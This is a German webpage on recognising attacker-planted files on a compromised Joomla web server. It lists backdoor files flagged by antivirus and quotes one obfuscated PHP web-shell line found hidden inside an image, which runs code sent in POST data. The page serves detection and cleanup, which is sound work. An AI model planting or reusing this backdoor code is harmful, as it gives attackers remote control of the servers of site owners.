fremde Datei

Zusätzliche Dateien auf dem Webserver, zum Teil in Unterverzeichnissen oder in Verzeichnissen, die vom Hacker neu angelegt wurden sind ein sicheres Indiz dafür das der Server gehackt wurde. Aber nicht jede uns unbekannte Datei ist stammt wirklich von Hackern. Bei der Suche nach eventuellen "fremden Dateien" vergleiche ich z.B. per TotalCommander meine lokale Sicherung mit der Version im Netz. Dateien, die es nicht in der lokalen Sicherung gibt, sind in jedem Fall verdächtig.
Artikel:

gallery.php.suspected

  • Verzeichnis: \aa\libraries\
  • Datei: gallery.php.suspected
  • Datei: gallery.php

lt. Microsoft Security Essentials

Backdoor:PHP/Small.M

Kategorie: Hintertür

Beschreibung: Dieses Programm stellt einen Remotezugriff auf den Computer bereit, auf dem es installiert ist.

Empfohlene Aktion: Entfernen Sie diese Software unverzüglich.

weiterlesen ...

Artikel:

list.php.suspected

  • Verzeichnis: \temp\u\a\
  • Datei: list.php.suspected

lt. Microsoft Security Essentials

Backdoor:PHP/Small.M

Kategorie: Hintertür

Beschreibung: Dieses Programm stellt einen Remotezugriff auf den Computer bereit, auf dem es installiert ist.

Empfohlene Aktion: Entfernen Sie diese Software unverzüglich.

weiterlesen ...

Artikel:

thumb_j2.php.jpg

Die Datei thumb_j2.php5.jpg gefunden im Verzeichnis images gehört jedenfalls nicht dorthin. Das Bild enthält zudem den nachfolgenden Code:
<?php @assert(@base64_decode(@str_rot13($_POST["data"])));?>
Unabhängig davon ist die Datei ein Bild und wird als solches angezeigt.

Wie ist die Datei auf den Server gekommmen?

Im konkreten Fall wurde die befallene Homepage in Joomla 2.5.14 erstellt und seit der Erstellung nicht upgedatet.

weiterlesen ...

^